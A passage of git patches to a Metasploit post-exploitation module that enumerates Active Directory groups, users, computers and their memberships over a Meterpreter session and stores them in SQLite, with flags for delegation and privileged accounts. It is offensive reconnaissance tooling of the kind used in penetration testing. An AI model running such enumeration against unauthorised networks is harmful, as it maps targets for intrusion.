'u_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'u_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'u_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'u_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'u_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'u_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'u_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'u_SAM_DOMAIN_OBJECT INTEGER,'\ + 'u_SAM_GROUP_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'u_SAM_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'u_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'u_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'u_SAM_TRUST_ACCOUNT INTEGER,'\ + 'u_SAM_APP_BASIC_GROUP INTEGER,'\ + 'u_SAM_APP_QUERY_GROUP INTEGER,'\ + 'u_SAM_ACCOUNT_TYPE_MAX INTEGER)' db.execute(sql_table_users) # Create the table for the mapping between the two (membership) @@ -495,124 +506,6 @@ class Metasploit3 < Msf::Post db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_APP_QUERY_GROUP',0x40000001)") db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ACCOUNT_TYPE_MAX',0x7fffffff)") - # Now create the computer query view (which joins lookup tables and prefixes everything with c_) - # This is essentially to maintain namespace (less of an issue for computers but - # I have done it for this table too in order to maintain consistency) - db.execute('DROP VIEW IF EXISTS view_ad_computers') - sql_view_computers = 'CREATE VIEW view_ad_computers AS SELECT '\ - 'rid AS c_rid,'\ - 'distinguishedName AS c_distinguishedName,'\ - 'cn AS c_cn,'\ - 'sAMAccountType AS c_sAMAccountType,'\ - 'ref_sAMAccountType.name AS c_sAMAccountType_Name,'\ - 'sAMAccountName AS c_sAMAccountName,'\ - 'dNSHostName AS c_dNSHostName,'\ - 'displayName AS c_displayName,'\ - 'description AS c_description,'\ - 'comments AS c_comments,'\ - 'logonCount AS c_logonCount,'\ - 'userAccountControl AS c_userAccountControl,'\ - 'primaryGroupID AS c_primaryGroupID,'\ - 'badPwdCount AS c_badPwdCount,'\ - 'operatingSystem AS c_operatingSystem,'\ - 'operatingSystemServicePack AS c_operatingSystemServicePack,'\ - 'operatingSystemVersion AS c_operatingSystemVersion,'\ - 'whenCreated AS c_whenCreated,'\ - 'whenChanged AS c_whenChanged,'\ - 'ADS_UF_SCRIPT AS c_ADS_UF_SCRIPT,'\ - 'ADS_UF_ACCOUNTDISABLE AS c_ADS_UF_ACCOUNTDISABLE,'\ - 'ADS_UF_HOMEDIR_REQUIRED AS c_ADS_UF_HOMEDIR_REQUIRED,'\ - 'ADS_UF_LOCKOUT AS c_ADS_UF_LOCKOUT,'\ - 'ADS_UF_PASSWD_NOTREQD AS c_ADS_UF_PASSWD_NOTREQD,'\ - 'ADS_UF_PASSWD_CANT_CHANGE AS c_ADS_UF_PASSWD_CANT_CHANGE,'\ - 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED AS c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,'\ - 'ADS_UF_TEMP_DUPLICATE_ACCOUNT AS c_ADS_UF_TEMP_DUPLICATE_ACCOUNT,'\ - 'ADS_UF_NORMAL_ACCOUNT AS c_ADS_UF_NORMAL_ACCOUNT,'\ - 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT AS c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT,'\ - 'ADS_UF_WORKSTATION_TRUST_ACCOUNT AS c_ADS_UF_WORKSTATION_TRUST_ACCOUNT,'\ - 'ADS_UF_SERVER_TRUST_ACCOUNT AS c_ADS_UF_SERVER_TRUST_ACCOUNT,'\ - 'ADS_UF_DONT_EXPIRE_PASSWD AS c_ADS_UF_DONT_EXPIRE_PASSWD,'\ - 'ADS_UF_MNS_LOGON_ACCOUNT AS c_ADS_UF_MNS_LOGON_ACCOUNT,'\ - 'ADS_UF_SMARTCARD_REQUIRED AS c_ADS_UF_SMARTCARD_REQUIRED,'\ - 'ADS_UF_TRUSTED_FOR_DELEGATION AS c_ADS_UF_TRUSTED_FOR_DELEGATION,'\ - 'ADS_UF_NOT_DELEGATED AS c_ADS_UF_NOT_DELEGATED,'\ - 'ADS_UF_USE_DES_KEY_ONLY AS c_ADS_UF_USE_DES_KEY_ONLY,'\ - 'ADS_UF_DONT_REQUIRE_PREAUTH AS c_ADS_UF_DONT_REQUIRE_PREAUTH,'\ - 'ADS_UF_PASSWORD_EXPIRED AS c_ADS_UF_PASSWORD_EXPIRED,'\ - 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION AS c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION '\ - 'FROM ad_computers LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_computers.sAMAccountType' - db.execute(sql_view_computers) - - # Create the view for the AD Groups - db.execute('DROP VIEW IF EXISTS view_ad_groups') - sql_view_group = 'CREATE VIEW view_ad_groups AS SELECT '\ - 'rid AS g_rid,'\ - 'distinguishedName AS g_distinguishedName,'\ - 'sAMAccountType AS g_sAMAccountType,'\ - 'ref_sAMAccountType.name AS g_sAMAccountType_Name,'\ - 'sAMAccountName AS g_sAMAccountName,'\ - 'groupType AS g_groupType,'\ - 'adminCount AS g_adminCount,'\ - 'description AS g_description,'\ - 'comments AS g_comments,'\ - 'whenChanged AS g_whenChanged,'\ - 'whenCreated AS g_whenCreated,'\ - 'GT_GROUP_CREATED_BY_SYSTEM AS g_GT_GROUP_CREATED_BY_SYSTEM,'\ - 'GT_GROUP_SCOPE_GLOBAL AS g_GT_GROUP_SCOPE_GLOBAL,'\ - 'GT_GROUP_SCOPE_LOCAL AS g_GT_GROUP_SCOPE_LOCAL,'\ - 'GT_GROUP_SCOPE_UNIVERSAL AS g_GT_GROUP_SCOPE_UNIVERSAL,'\ - 'GT_GROUP_SAM_APP_BASIC AS g_GT_GROUP_SAM_APP_BASIC,'\ - 'GT_GROUP_SAM_APP_QUERY AS g_GT_GROUP_SAM_APP_QUERY,'\ - 'GT_GROUP_SECURITY AS g_GT_GROUP_SECURITY,'\ - 'GT_GROUP_DISTRIBUTION as U_GT_GROUP_DISTRIBUTION '\ - 'FROM ad_groups LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_groups.sAMAccountType' - db.execute(sql_view_group) - - # Create the view for the AD Users - db.execute('DROP VIEW IF EXISTS view_ad_users') - sql_view_users = 'CREATE VIEW view_ad_users AS SELECT '\ - 'rid AS u_rid,'\ - 'distinguishedName AS u_distinguishedName,'\ - 'description AS u_description,'\ - 'displayName AS u_displayName,'\ - 'sAMAccountType AS u_sAMAccountType,'\ - 'ref_sAMAccountType.name AS u_sAMAccountType_Name,'\ - 'sAMAccountName AS u_sAMAccountName,'\ - 'logonCount AS u_logonCount,'\ - 'userAccountControl AS u_userAccountControl,'\ - 'primaryGroupID AS u_primaryGroupID,'\ - 'accountExpires AS u_accountExpires,'\ - 'adminCount AS u_adminCount,'\ - 'badPwdCount AS u_badPwdCount,'\ - 'userPrincipalName AS u_userPrincipalName,'\ - 'comments AS u_comments,'\ - 'title AS u_title,'\ - 'whenCreated AS u_whenCreated,'\ - 'whenChanged AS u_whenChanged,'\ - 'ADS_UF_SCRIPT AS u_ADS_UF_SCRIPT,'\ - 'ADS_UF_ACCOUNTDISABLE AS u_ADS_UF_ACCOUNTDISABLE,'\ - 'ADS_UF_HOMEDIR_REQUIRED AS u_ADS_UF_HOMEDIR_REQUIRED,'\ - 'ADS_UF_LOCKOUT AS u_ADS_UF_LOCKOUT,'\ - 'ADS_UF_PASSWD_NOTREQD AS u_ADS_UF_PASSWD_NOTREQD,'\ - 'ADS_UF_PASSWD_CANT_CHANGE AS u_ADS_UF_PASSWD_CANT_CHANGE,'\ - 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED AS u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,'\ - 'ADS_UF_TEMP_DUPLICATE_ACCOUNT AS u_ADS_UF_TEMP_DUPLICATE_ACCOUNT,'\ - 'ADS_UF_NORMAL_ACCOUNT AS u_ADS_UF_NORMAL_ACCOUNT,'\ - 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT AS u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT,'\ - 'ADS_UF_WORKSTATION_TRUST_ACCOUNT AS u_ADS_UF_WORKSTATION_TRUST_ACCOUNT,'\ - 'ADS_UF_SERVER_TRUST_ACCOUNT AS u_ADS_UF_SERVER_TRUST_ACCOUNT,'\ - 'ADS_UF_DONT_EXPIRE_PASSWD AS u_ADS_UF_DONT_EXPIRE_PASSWD,'\ - 'ADS_UF_MNS_LOGON_ACCOUNT AS u_ADS_UF_MNS_LOGON_ACCOUNT,'\ - 'ADS_UF_SMARTCARD_REQUIRED AS u_ADS_UF_SMARTCARD_REQUIRED,'\ - 'ADS_UF_TRUSTED_FOR_DELEGATION AS u_ADS_UF_TRUSTED_FOR_DELEGATION,'\ - 'ADS_UF_NOT_DELEGATED AS u_ADS_UF_NOT_DELEGATED,'\ - 'ADS_UF_USE_DES_KEY_ONLY AS u_ADS_UF_USE_DES_KEY_ONLY,'\ - 'ADS_UF_DONT_REQUIRE_PREAUTH AS u_ADS_UF_DONT_REQUIRE_PREAUTH,'\ - 'ADS_UF_PASSWORD_EXPIRED AS u_ADS_UF_PASSWORD_EXPIRED,'\ - 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION as u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION '\ - 'FROM ad_users LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_users.sAMAccountType' - db.execute(sql_view_users) - # Create the view for the AD User/Group membership db.execute('DROP VIEW IF EXISTS view_ad_mapping') sql_view_mapping = 'CREATE VIEW view_ad_mapping AS SELECT view_ad_groups.*,view_ad_users.* FROM ad_mapping '\ From 14f71eabdb58ca9d26c42230068acd3a1a671164 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:42:25 +0000 Subject: [PATCH 116/686] Completing processing the sAMAccountType value --- .../windows/gather/ad_groupusers_to_sql.rb | 64 +++++++++++++++---- 1 file changed, 52 insertions(+), 12 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 5fc151987d..5302d86f04 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -91,17 +91,18 @@ class Metasploit3 < Msf::Post users_in_group = query(users_filter, max_search, users_fields) grouptype_int = individual_group[7][:value].to_i # Set this here because it is used a lot below + sat_int = individual_group[2][:value].to_i # Add the group to the database # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx - sql_param_group = { rid: group_rid, + sql_param_group = { g_rid: group_rid, g_distinguishedName: individual_group[0][:value].to_s, - g_sAMAccountType: individual_group[2][:value].to_i, + g_sAMAccountType: sat_int, g_sAMAccountName: individual_group[3][:value].to_s, g_whenChanged: individual_group[4][:value].to_s, g_whenCreated: individual_group[5][:value].to_s, g_description: individual_group[6][:value].to_s, - g_groupType: individual_group[7][:value].to_i, + g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, g_comments: individual_group[9][:value].to_s, # Specifies a group that is created by the system. @@ -123,6 +124,18 @@ class Metasploit3 < Msf::Post # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that # DISTRIBUTION is in fact the inverse of SECURITY...:) g_GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0, + #Now add sAMAccountType constants + g_SAM_DOMAIN_OBJECT: (sat_int==0) ? 1 : 0, + g_SAM_GROUP_OBJECT: (sat_int==0x10000000) ? 1 : 0, + g_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int==0x10000001) ? 1 : 0, + g_SAM_ALIAS_OBJECT: (sat_int==0x20000000) ? 1 : 0, + g_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int==0x20000001) ? 1 : 0, + g_SAM_NORMAL_USER_ACCOUNT: (sat_int==0x30000000) ? 1 : 0, + g_SAM_MACHINE_ACCOUNT: (sat_int==0x30000001) ? 1 : 0, + g_SAM_TRUST_ACCOUNT: (sat_int==0x30000002) ? 1 : 0, + g_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, + g_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, + g_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, } run_sqlite_query(db, 'ad_groups', sql_param_group) @@ -133,6 +146,7 @@ class Metasploit3 < Msf::Post print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] uac_int = group_user[7][:value].to_i #Set this because it is used so frequently below + sat_int = group_user[2][:value].to_i # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx @@ -203,7 +217,19 @@ class Metasploit3 < Msf::Post #this option enabled should be strictly controlled. This setting enables a service running #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. - u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 + u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, + #Now add sAMAccountType constants + u_SAM_DOMAIN_OBJECT: (sat_int==0) ? 1 : 0, + u_SAM_GROUP_OBJECT: (sat_int==0x10000000) ? 1 : 0, + u_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int==0x10000001) ? 1 : 0, + u_SAM_ALIAS_OBJECT: (sat_int==0x20000000) ? 1 : 0, + u_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int==0x20000001) ? 1 : 0, + u_SAM_NORMAL_USER_ACCOUNT: (sat_int==0x30000000) ? 1 : 0, + u_SAM_MACHINE_ACCOUNT: (sat_int==0x30000001) ? 1 : 0, + u_SAM_TRUST_ACCOUNT: (sat_int==0x30000002) ? 1 : 0, + u_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, + u_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, + u_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -233,6 +259,7 @@ class Metasploit3 < Msf::Post computer_rid = get_rid(comp[1][:value]).to_i uac_int = comp[8][:value].to_i #Set this because it is used so frequently below + sat_int = comp[4][:value].to_i # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx @@ -240,11 +267,12 @@ class Metasploit3 < Msf::Post # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. + # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx sql_param_computer = { c_rid: computer_rid, c_distinguishedName: comp[0][:value].to_s, c_cn: comp[2][:value].to_s, c_dNSHostName: comp[3][:value].to_s, - c_sAMAccountType: comp[4][:value].to_i, + c_sAMAccountType: sat_int, c_sAMAccountName: comp[5][:value].to_s, c_displayName: comp[6][:value].to_s, c_logonCount: comp[7][:value].to_i, @@ -306,7 +334,19 @@ class Metasploit3 < Msf::Post #this option enabled should be strictly controlled. This setting enables a service running #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. - c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 + c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, + #Now add the sAMAccountType objects + c_SAM_DOMAIN_OBJECT: (sat_int==0) ? 1 : 0, + c_SAM_GROUP_OBJECT: (sat_int==0x10000000) ? 1 : 0, + c_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int==0x10000001) ? 1 : 0, + c_SAM_ALIAS_OBJECT: (sat_int==0x20000000) ? 1 : 0, + c_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int==0x20000001) ? 1 : 0, + c_SAM_NORMAL_USER_ACCOUNT: (sat_int==0x30000000) ? 1 : 0, + c_SAM_MACHINE_ACCOUNT: (sat_int==0x30000001) ? 1 : 0, + c_SAM_TRUST_ACCOUNT: (sat_int==0x30000002) ? 1 : 0, + c_SAM_APP_BASIC_GROUP: (sat_int==0x40000000) ? 1 : 0, + c_SAM_APP_QUERY_GROUP: (sat_int==0x40000001) ? 1 : 0, + c_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, } run_sqlite_query(db, 'ad_computers', sql_param_computer) print_line "Computer [#{sql_param_computer[:cn]}][#{sql_param_computer[:dNSHostName]}][#{sql_param_computer[:rid]}]" if datastore['SHOW_USERGROUPS'] @@ -478,8 +518,8 @@ class Metasploit3 < Msf::Post 'user_rid INTEGER NOT NULL,' \ 'group_rid INTEGER NOT NULL,'\ 'PRIMARY KEY (user_rid, group_rid),'\ - 'FOREIGN KEY(user_rid) REFERENCES ad_users(rid)'\ - 'FOREIGN KEY(group_rid) REFERENCES ad_groups(rid))' + 'FOREIGN KEY(user_rid) REFERENCES ad_users(u_rid)'\ + 'FOREIGN KEY(group_rid) REFERENCES ad_groups(g_rid))' db.execute(sql_table_mapping) # Create the reference table for sAMAccountType @@ -507,10 +547,10 @@ class Metasploit3 < Msf::Post db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ACCOUNT_TYPE_MAX',0x7fffffff)") # Create the view for the AD User/Group membership - db.execute('DROP VIEW IF EXISTS view_ad_mapping') - sql_view_mapping = 'CREATE VIEW view_ad_mapping AS SELECT view_ad_groups.*,view_ad_users.* FROM ad_mapping '\ - 'INNER JOIN view_ad_groups ON view_ad_groups.g_rid = ad_mapping.group_rid '\ - 'INNER JOIN view_ad_users ON view_ad_users.u_rid = ad_mapping.user_rid' + db.execute('DROP VIEW IF EXISTS view_mapping') + sql_view_mapping = 'CREATE VIEW view_mapping AS SELECT ad_groups.*,ad_users.* FROM ad_mapping '\ + 'INNER JOIN ad_groups ON _ad_groups.g_rid = ad_mapping.group_rid '\ + 'INNER JOIN ad_users ON ad_users.u_rid = ad_mapping.user_rid' db.execute(sql_view_mapping) return db, filename From cdf430e6892e04bcf2f5d0ac52fc2c30ade63580 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:44:26 +0000 Subject: [PATCH 117/686] Fixed bug relating to forgetting to add columns to the schema --- .../post/windows/gather/ad_groupusers_to_sql.rb | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 5302d86f04..f5e093588d 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -349,7 +349,7 @@ class Metasploit3 < Msf::Post c_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, } run_sqlite_query(db, 'ad_computers', sql_param_computer) - print_line "Computer [#{sql_param_computer[:cn]}][#{sql_param_computer[:dNSHostName]}][#{sql_param_computer[:rid]}]" if datastore['SHOW_USERGROUPS'] + print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_USERGROUPS'] end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e @@ -455,7 +455,18 @@ class Metasploit3 < Msf::Post 'g_GT_GROUP_SAM_APP_BASIC INTEGER,'\ 'g_GT_GROUP_SAM_APP_QUERY INTEGER,'\ 'g_GT_GROUP_SECURITY INTEGER,'\ - 'g_GT_GROUP_DISTRIBUTION INTEGER)' + 'g_GT_GROUP_DISTRIBUTION INTEGER,'\ + 'g_SAM_DOMAIN_OBJECT INTEGER,'\ + 'g_SAM_GROUP_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'g_SAM_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'g_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'g_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'g_SAM_TRUST_ACCOUNT INTEGER,'\ + 'g_SAM_APP_BASIC_GROUP INTEGER,'\ + 'g_SAM_APP_QUERY_GROUP INTEGER,'\ + 'g_SAM_ACCOUNT_TYPE_MAX INTEGER)' db.execute(sql_table_group) # Create the table for the AD Users From 86294a869e7bffee54e2112672d04328edb3b0ad Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:45:10 +0000 Subject: [PATCH 118/686] No longer need the sAMAccountType lookup table --- .../windows/gather/ad_groupusers_to_sql.rb | 24 ------------------- 1 file changed, 24 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index f5e093588d..2376c66865 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -533,30 +533,6 @@ class Metasploit3 < Msf::Post 'FOREIGN KEY(group_rid) REFERENCES ad_groups(g_rid))' db.execute(sql_table_mapping) - # Create the reference table for sAMAccountType - # https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx - db.execute('DROP TABLE IF EXISTS ref_sAMAccountType') - sql_table_ref_sac = 'CREATE TABLE ref_sAMAccountType ('\ - 'id INTEGER PRIMARY KEY NOT NULL,'\ - 'name TEXT UNIQUE NOT NULL)' - db.execute(sql_table_ref_sac) - - # Now insert the data into the sAMAccoutType reference table - # SQLite v3.7+ supports a rather convoluted UNION SELECT way of adding multiple rows - # in one query but for the sake of simplicity and readability, I have just left these as - # separate insert statements. Its hardly an efficiency problem given the rest of the module! - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_DOMAIN_OBJECT',0)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_GROUP_OBJECT',0x10000000)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NON_SECURITY_GROUP_OBJECT',0x10000001)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ALIAS_OBJECT',0x20000000)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NON_SECURITY_ALIAS_OBJECT',0x20000001)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NORMAL_USER_ACCOUNT',0x30000000)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_MACHINE_ACCOUNT',0x30000001)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_TRUST_ACCOUNT',0x30000002)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_APP_BASIC_GROUP',0x40000000)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_APP_QUERY_GROUP',0x40000001)") - db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ACCOUNT_TYPE_MAX',0x7fffffff)") - # Create the view for the AD User/Group membership db.execute('DROP VIEW IF EXISTS view_mapping') sql_view_mapping = 'CREATE VIEW view_mapping AS SELECT ad_groups.*,ad_users.* FROM ad_mapping '\ From b0eba24c5f457f0f3f4a4af8e15f6ba1c496c947 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:55:44 +0000 Subject: [PATCH 119/686] Fixed verbosity bug and tidied up --- .../post/windows/gather/ad_groupusers_to_sql.rb | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 2376c66865..9ca4430e3e 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -29,9 +29,9 @@ class Metasploit3 < Msf::Post )) register_options([ - OptString.new('GROUP_FILTER', [true, 'Additional LDAP filters to perform when searching for initial groups', '']), - OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form.', false]), - OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form.', false]), + OptString.new('GROUP_FILTER', [false, 'Additional LDAP filters to use when searching for initial groups', '']), + OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form to the console.', false]), + OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form to the console.', false]), OptInt.new('THREADS', [true, 'Number of threads to spawn to gather membership of each group.', 20]) ], self.class) end @@ -47,10 +47,10 @@ class Metasploit3 < Msf::Post vprint_status "Retrieving AD Groups" begin group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comments'] - if datastore['GROUP_FILTER'] - group_query = "(&(objectClass=group)(#{datastore['GROUP_FILTER']}))" - else + if datastore['GROUP_FILTER'].empty? group_query = "(objectClass=group)" + else + group_query = "(&(objectClass=group)(#{datastore['GROUP_FILTER']}))" end groups = query(group_query, max_search, group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e @@ -65,6 +65,7 @@ class Metasploit3 < Msf::Post end # Go through each of the groups and identify the individual users in each group + vprint_status "Groups retrieval completed: #{groups[:results].size} group(s)" vprint_status "Retrieving AD Group Membership" users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title', 'accountExpires', 'adminCount'] @@ -349,7 +350,7 @@ class Metasploit3 < Msf::Post c_SAM_ACCOUNT_TYPE_MAX: (sat_int==0x7fffffff) ? 1 : 0, } run_sqlite_query(db, 'ad_computers', sql_param_computer) - print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_USERGROUPS'] + print_line "Computer [#{sql_param_computer[:c_cn]}][#{sql_param_computer[:c_dNSHostName]}][#{sql_param_computer[:c_rid]}]" if datastore['SHOW_COMPUTERS'] end rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e From b8274cca01c86579d1a38be394c1962842de80c5 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:59:31 +0000 Subject: [PATCH 120/686] Tested --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 9ca4430e3e..4dece0c9da 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -537,7 +537,7 @@ class Metasploit3 < Msf::Post # Create the view for the AD User/Group membership db.execute('DROP VIEW IF EXISTS view_mapping') sql_view_mapping = 'CREATE VIEW view_mapping AS SELECT ad_groups.*,ad_users.* FROM ad_mapping '\ - 'INNER JOIN ad_groups ON _ad_groups.g_rid = ad_mapping.group_rid '\ + 'INNER JOIN ad_groups ON ad_groups.g_rid = ad_mapping.group_rid '\ 'INNER JOIN ad_users ON ad_users.u_rid = ad_mapping.user_rid' db.execute(sql_view_mapping) From d5436c6fae648e788f8ad8636700b1d38771052a Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 02:01:11 +0000 Subject: [PATCH 121/686] msftidy is now silent --- .../windows/gather/ad_groupusers_to_sql.rb | 358 +++++++++--------- 1 file changed, 179 insertions(+), 179 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 4dece0c9da..b455dccd51 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -79,33 +79,33 @@ class Metasploit3 < Msf::Post group_gather = [] 1.upto(threadcount) do group_gather << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| - begin + begin next if !individual_group || individual_group.empty? || individual_group.nil? # Get the Group RID group_rid = get_rid(individual_group[1][:value]).to_i - # Perform the ADSI query to retrieve the effective users in each group (recursion) - vprint_status "Retrieving members of #{individual_group[3][:value]}" - users_filter = 